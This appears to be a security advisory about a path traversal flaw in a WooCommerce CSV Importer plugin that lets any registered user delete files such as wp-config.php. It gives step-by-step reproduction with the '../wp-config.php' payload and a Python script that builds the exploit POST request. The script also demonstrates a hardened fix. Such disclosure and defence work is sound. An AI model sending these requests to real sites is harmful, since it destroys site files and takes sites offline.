WooCommerce CSV Importer Path Traversal Vulnerability Allowing Arbitrary File Deletion

Vulnerability

A path traversal vulnerability has been identified in the WooCommerce CSV Importer plugin, version 3.3.6. The delete_export_file AJAX action accepts a filename parameter from any authenticated (registered) user and passes it to the deletion routine without stripping directory traversal sequences. An attacker can therefore craft a POST request whose filename parameter escapes the designated export directory and deletes files elsewhere in the WordPress installation, such as wp-config.php.

Impact

Exploitation of this vulnerability results in the unauthorized deletion of critical files. wp-config.php holds the database credentials and authentication keys; removing it takes the site offline and leaves WordPress in its initial setup state. Any other file the web server process is permitted to delete is equally at risk, and a deleted file cannot be recovered without a backup.

Reproduction

To reproduce this vulnerability, authenticate as any registered user (the request must carry that user's WordPress session cookie), then send a POST request to wp-admin/admin-ajax.php with the action parameter set to delete_export_file and a filename parameter that contains directory traversal sequences, such as '../wp-config.php'. The number of '../' segments required depends on where the export directory sits relative to the target file. The request deletes the specified file, demonstrating the path traversal vulnerability; run it only against a disposable test installation, because the deletion is real and irreversible.
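The following Python script is an added example, not code from the advisory or from the WooCommerce CSV Importer plugin. It covers both the flaw described under Vulnerability and the request described under Reproduction: build_poc_request assembles (but does not send) the POST to admin-ajax.php with only the two parameters the advisory names, and delete_export_file is a simulated handler that in its vulnerable form joins the attacker-controlled filename onto the export directory without validation, and in its hardened form requires a bare file name and confirms that the resolved path stays inside the export directory. The on-disk layout (an exports directory one level below wp-config.php) is constructed for the demo; the real plugin's export directory, its handler code and the session cookie value are assumptions.

```python
"""Added example: simulate the delete_export_file traversal and the check that blocks it."""
import os
import tempfile
from urllib.parse import urlencode
from urllib.request import Request

AJAX_ACTION = "delete_export_file"  # AJAX action named in the advisory


def build_poc_request(site_url, filename, session_cookie):
    """Build, without sending, the POST described in the advisory.

    session_cookie is the attacker's own logged-in WordPress cookie header
    (assumed; any registered account suffices per the advisory).
    """
    body = urlencode({"action": AJAX_ACTION, "filename": filename}).encode()
    return Request(
        site_url.rstrip("/") + "/wp-admin/admin-ajax.php",
        data=body,
        headers={
            "Content-Type": "application/x-www-form-urlencoded",
            "Cookie": session_cookie,
        },
        method="POST",
    )


def path_is_inside(base_dir, candidate):
    """True only if candidate resolves (symlinks included) to a path strictly under base_dir."""
    base = os.path.realpath(base_dir)
    target = os.path.realpath(candidate)
    return os.path.commonpath([base, target]) == base and target != base


def delete_export_file(export_dir, filename, hardened):
    """Simulated AJAX handler (hypothetical, not the plugin's code).

    hardened=False reproduces the flaw: the raw filename is joined onto the
    export directory and deleted. hardened=True applies the containment check.
    """
    if hardened:
        # A legitimate export is a bare file name; anything with a directory
        # component (including "..") is rejected before touching the filesystem.
        if filename in ("", ".", "..") or filename != os.path.basename(filename):
            return "rejected: not a bare file name"
        target = os.path.join(export_dir, filename)
        # Defence in depth: a symlink inside export_dir could still point outside.
        if not path_is_inside(export_dir, target):
            return "rejected: outside export dir"
    else:
        target = os.path.join(export_dir, filename)  # vulnerable: no validation at all
    if not os.path.isfile(target):
        return "missing"
    os.remove(target)
    return "deleted"


def demo(hardened):
    """Create a throwaway site layout, attempt the traversal, report the outcome.

    Returns (handler result, whether wp-config.php still exists).
    """
    with tempfile.TemporaryDirectory() as root:
        export_dir = os.path.join(root, "exports")  # constructed layout: one level below root
        os.mkdir(export_dir)
        config = os.path.join(root, "wp-config.php")
        open(config, "w").close()
        result = delete_export_file(export_dir, "../wp-config.php", hardened)
        return result, os.path.exists(config)


if __name__ == "__main__":
    req = build_poc_request("https://shop.example", "../wp-config.php",
                            "wordpress_logged_in_abc=attacker-session")
    print(req.full_url, req.data)
    print("vulnerable handler:", demo(hardened=False))
    print("hardened handler:  ", demo(hardened=True))
```

The hardened branch rejects the traversal before any filesystem access, so a second line of defence (the realpath containment check) only matters for names that are already plain file names; keeping both costs nothing and also catches symlinks planted inside the export directory.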

Added: May 17, 2026, 1:28 PM
Updated: May 17, 2026, 1:28 PM

Vulnerability Rating

Custom Algorithm
spread: 0.0
impact: 2.5
exploitability: 6.6
remediation: 0.0
relevance: 8.6
threat: 6.4
urgency: 2.9
incentive: 0.0

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.